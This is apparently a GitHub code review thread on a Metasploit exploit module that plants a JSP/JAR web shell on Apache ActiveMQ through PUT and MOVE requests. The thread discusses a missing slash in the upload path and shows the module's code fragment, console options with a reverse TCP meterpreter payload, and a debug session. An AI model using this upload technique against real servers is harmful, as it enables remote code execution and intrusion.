modules/exploits/multi/http/apache_activemq_upload_jsp.rb

```diff
@@ -91,7 +91,7 @@ def try_upload(path, jar_payload, payload_name)
     ['.jar', '.jsp'].each do |ext|
       file_name = payload_name + ext
       data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
-      move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" }
+      move_headers = { 'Destination' => "#{@url}/#{path}#{file_name}" }
```

Comment:
Technically speaking shouldn't there also be a slash after `#{path}` as well? It would appear that `normalize_url()`, according to https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/auxiliary/dos/http/rails_action_view.rb#L59-L64, is only responsible for making sure the URL has a starting slash and that it doesn't contain any double slashes.

```suggestion
      move_headers = { 'Destination' => "#{@url}/#{path}/#{file_name}" }
```

Reply:
Here is an example of why this is important:

```
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set UploadPath asdf
UploadPath => asdf
msf6 exploit(multi/http/apache_activemq_upload_jsp) > show options

Module options (exploit/multi/http/apache_activemq_upload_jsp):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   AutoCleanup    true             no        Remove web shells after callback is received
   BasicAuthPass  admin            yes       The password for the specified username
   BasicAuthUser  admin            yes       The username to authenticate as
   JSP                             no        JSP name to use, excluding the .jsp extension (default: random)
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          8161             yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                           no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.31.30.163    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/apache_activemq_upload_jsp) > run

[*] Started reverse TCP handler on 172.31.30.163:4444 
[-] Exploit aborted due to failure: unreachable: Couldn't connect to the target!
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/apache_activemq_upload_jsp) > run

[*] Started reverse TCP handler on 172.31.30.163:4444 

From: /home/gwillcox/git/metasploit-framework/modules/exploits/multi/http/apache_activemq_upload_jsp.rb:95 Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule#try_upload:

     90: def try_upload(path, jar_payload, payload_name)
     91:   ['.jar', '.jsp'].each do |ext|
     92:     file_name = payload_name + ext
     93:     data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
     94:     require 'pry'; binding.pry
 =>  95:     move_headers = { 'Destination' => "#{@url}/#{path}#{file_name}" }
     96:     upload_uri = normalize_uri('fileserver', file_name)
     97:     print_status("Uploading #{move_headers['Destination']}")
     98:     register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true')
     99:     return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&
    100:                             send_request('MOVE', upload_uri, 204, 'headers' => move_headers)
    101:     @trigger_resource = /webapps(.*)/.match(path)[1]
    102:   end
    103:   true
    104: end

[1] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> @url
=> "http://127.0.0.1:8161"
[2] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> path
=> "/webapps/asdf"
[3] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> file_name
=> "tvVssPhcUW.jar"
[4] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> 
[5] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> move_headers
=> {"Destination"=>"http://127.0.0.1:8161//webapps/asdftvVssPhcUW.jar"}
[6] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> 
```

As one can see from the output above, if the user doesn't append a `/` to the end of their custom upload path, then the file uploads will be messed up and the contents of `file_name` and `path` will be concatenated together into the name of the file to be uploaded, which is not what we want.

Reply:
Adding another forward slash does technically still work, but the main problem here was its lack of presence in the first part of the URL and the module failing to execute because of that.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/15337/commits/5b274770ef9f0bfd0f247af8f8569bcbbc5fb3de